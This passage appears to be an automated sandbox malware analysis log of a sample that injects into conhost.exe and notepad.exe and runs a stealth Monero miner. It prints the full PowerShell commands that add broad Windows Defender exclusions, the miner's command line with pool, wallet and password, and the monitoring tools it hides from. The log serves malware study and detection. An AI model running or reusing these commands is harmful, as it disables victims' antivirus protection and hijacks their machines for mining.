            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\notepad.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Windows\System32\notepad.exeSystem information queried: FirmwareTableInformationJump to behavior
            Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
            Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXERI.EXERO.
            Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXELOOKUP@&
            Source: conhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
            Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6001Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3782Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8293Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1285Jump to behavior
            Source: C:\Windows\System32\conhost.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5500Thread sleep count: 6001 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5500Thread sleep count: 3782 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5016Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7120Thread sleep count: 8293 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4888Thread sleep count: 1285 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6216Thread sleep time: -3689348814741908s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\notepad.exeNetwork Connect: 192.248.189.11 443Jump to behavior
            Source: C:\Windows\System32\notepad.exeNetwork Connect: 80.240.16.67 443Jump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exitJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" Jump to behavior
            Source: C:\Users\user\Desktop\9d2h99wrj.exeMemory allocated: C:\Windows\System32\conhost.exe base: 211B2B70000 protect: page execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\9d2h99wrj.exeThread created: C:\Windows\System32\conhost.exe EIP: B2B70000Jump to behavior
            Source: C:\Users\user\Desktop\9d2h99wrj.exeNtCreateThreadEx: Direct from: 0x401A17Jump to behavior
            Source: C:\Users\user\Desktop\9d2h99wrj.exeNtWriteVirtualMemory: Direct from: 0x401D57Jump to behavior
            Source: C:\Users\user\Desktop\9d2h99wrj.exeNtProtectVirtualMemory: Direct from: 0x401DD7Jump to behavior
            Source: C:\Users\user\Desktop\9d2h99wrj.exeNtClose: Direct from: 0x401CD7
            Source: C:\Users\user\Desktop\9d2h99wrj.exeNtAllocateVirtualMemory: Direct from: 0x401D97Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 140000000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\conhost.exeThread register set: target process: 7112Jump to behavior
            Source: C:\Users\user\Desktop\9d2h99wrj.exeMemory written: C:\Windows\System32\conhost.exe base: 211B2B70000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 140000000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 140001000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 140367000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 1404A0000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 140753000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 140775000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 140776000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 140777000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 140779000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 14077B000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 14077C000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: 14077D000Jump to behavior
            Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\System32\notepad.exe base: C98E169010Jump to behavior
            Source: C:\Users\user\Desktop\9d2h99wrj.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\9d2h99wrj.exe"Jump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exitJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\notepad.exe C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46TNT2eMYP5X7V1Kh4SRr8Z7Qb1jsLm74TXDLNkb5M6VgoazSKmN1kydrrcZZ9eqTF7UYDH7NsEbJFLfe7DDkAfK5Nc1VLK --pass=Paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" Jump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -command "add-mppreference -exclusionpath @(($pwd).path, $env:userprofile,$env:appdata,$env:temp,$env:systemroot,$env:homedrive,$env:systemdrive) -force" & powershell -command "add-mppreference -exclusionextension @('exe','dll') -force" & exit
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\notepad.exe c:\windows/system32\notepad.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46tnt2emyp5x7v1kh4srr8z7qb1jslm74txdlnkb5m6vgoazskmn1kydrrczz9eqtf7uydh7nsebjflfe7ddkafk5nc1vlk --pass=paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -command "add-mppreference -exclusionpath @(($pwd).path, $env:userprofile,$env:appdata,$env:temp,$env:systemroot,$env:homedrive,$env:systemdrive) -force" & powershell -command "add-mppreference -exclusionextension @('exe','dll') -force" & exitJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\notepad.exe c:\windows/system32\notepad.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=46tnt2emyp5x7v1kh4srr8z7qb1jslm74txdlnkb5m6vgoazskmn1kydrrczz9eqtf7uydh7nsebjflfe7ddkafk5nc1vlk --pass=paizley2019 --cpu-max-threads-hint=20 --cinit-stealth-targets="+iu/trnpctld3p+slbva5u4eyos6bvipemchgqx2wrucnfdomwh6dhl5h5kbqcjp6ycylsfu5lr1mi7nqay56b+5douwurapvcael2sr/n4=" --cinit-idle-wait=5 --cinit-idle-cpu=70 --cinit-stealth Jump to behavior
